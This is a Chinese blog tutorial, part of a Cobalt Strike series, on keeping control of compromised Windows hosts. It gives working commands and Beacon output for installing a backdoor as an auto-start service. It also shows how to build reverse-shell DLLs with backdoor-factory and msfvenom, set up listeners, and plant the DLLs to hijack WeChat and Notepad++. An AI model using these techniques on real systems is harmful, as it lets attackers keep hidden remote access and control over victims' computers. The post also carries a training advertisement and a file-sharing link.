Cobaltstrike系列教程(十三)控制持久化

0x000-前文

有技術交流或滲透測試培訓需求的朋友歡迎聯繫QQ547006660
2000人網絡安全交流羣,歡迎大佬們來玩
羣號820783253

0x001-右鍵菜單實現控制持久化

在windows中,拿到目標主機權限後,,維持權限是必不可少的工作。
目前常見的手法有:

1.註冊表
2.啓動項
3.計時任務
4.設置服務
5.shift後門
6.dll劫持(白加黑)
7.利用其他安裝的軟件

在我之前給出的插件中,已經包含了控制持久化的插件
如圖,裏面包含了很多控制持久化的方法,可自動執行
在這裏插入圖片描述
前幾個Persist(※)貌似都是劫持關鍵程序的dll實現控制持久化
Sticky Keys是大家熟悉的粘滯鍵後門(shift後門,摁五下shift彈出cmd窗口)
Scheduled Job方法爲寫計劃任務維持權限
最後一個我也沒整明白什麼意思,大牛們知道嘛?
利用這個菜單實現控制持久化雖然方便,但是存在一定的侷限,也有很多問題,下面簡單講兩種個人常用的維持權限的方法

0x002-Windows Service維持權限

在cobaltstrike中生成一個Windows service服務後門
在這裏插入圖片描述
導出時後門名爲beacon.exe
在這裏插入圖片描述
隨後在beacon中執行如下命令

beacon> cd C:\WINDOWS\Temp\
[] cd C:\WINDOWS\Temp\
[+] host called home, sent: 24 bytes

beacon> upload /root/beacon.exe
[] Tasked beacon to upload /root/beacon.exe as beacon.exe
[+] host called home, sent: 309782 bytes
beacon> shell sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[] Tasked beacon to run: sc create "thisisserver" binpath= "C:\WINDOWS\Temp\beacon.exe"
[+] host called home, sent: 93 bytes
[+] received output:
[SC] CreateService 成功

beacon> shell sc description "thisisserver" "description"
[] Tasked beacon to run: sc description "thisisserver" "description"
[+] host called home, sent: 74 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功

beacon> shell sc config "thisisserver" start= auto
[] Tasked beacon to run: sc config "thisisserver" start= auto
[+] host called home, sent: 67 bytes
[+] received output:
[SC] ChangeServiceConfig 成功

beacon> shell net start "thisisserver"
[] Tasked beacon to run: net start "thisisserver"
[+] host called home, sent: 55 bytes*

這樣的話目標機每次開機,都會運行你的beacon.exe後門,實現控制的持久化。
當然,如果目標主機存在殺毒全家桶的話,那麼對你後門的免殺是有很高要求的,至於cobaltstrike後門的免殺,打算過一段時間做個番外篇講,老鐵們可以關注下~

0x003-dll劫持(白加黑)維持權限

Dll劫持的話,主要是劫持那些經常運行程序的dll,這樣程序一運行,就會加載我們的惡意dll。實現控制持久化

我們來看一個例子,劫持微信的dll

首先使用Process Explore查看微信調用的dll
在這裏插入圖片描述
本次測試,是劫持的他的d3dcompiler_47.dll
使用backdoor factory製作dll後門(保存在目錄的backdoored文件夾下)
鏈接:https://github.com/secretsquirrel/the-backdoor-factory
命令如下

python backdoor.py -f d3dcompiler_47.dll -s reverse_shell_tcp_inline -P 6666 -H 8.8.8.8(你的teamserver)

在這裏插入圖片描述
把這個加了後門的dll放到微信程序的文件夾下
用cobaltstrike配置一個tcp協議監聽6666端口的Listener,或者nc監聽6666端口,目標機運行微信時,即可收到反彈的shell

再看一個,劫持notepad的dll:
我們首先打開Kali,用Metasploit或者cobaltstrike來生成一個dll木馬

Metasploit生成dll後門命令

msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.199.107 lport=6666 -f dll > ./Msimg32.dll

Cobaltstrike生成dll後門方法

在這裏插入圖片描述
然後配置6666端口的監聽
Metasploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.107
set lport 6666
exploit

Cobaltstrike配置監聽
請看教程第二節

然後我們把dll放到notepad文件夾中,運行notpad++,即可返回會話。

在這裏插入圖片描述

0x004-小福利

分享一下今天剛剛買的1000多套PPT模板,有了這些模板,做課件輕輕鬆鬆~
回覆即可下載
在這裏插入圖片描述
鏈接:https://pan.baidu.com/s/1SGCyFtuQsd0yzKAIMvRLyQ
提取碼:6x55

發佈了21 篇原創文章 · 獲贊 28 · 訪問量 2萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章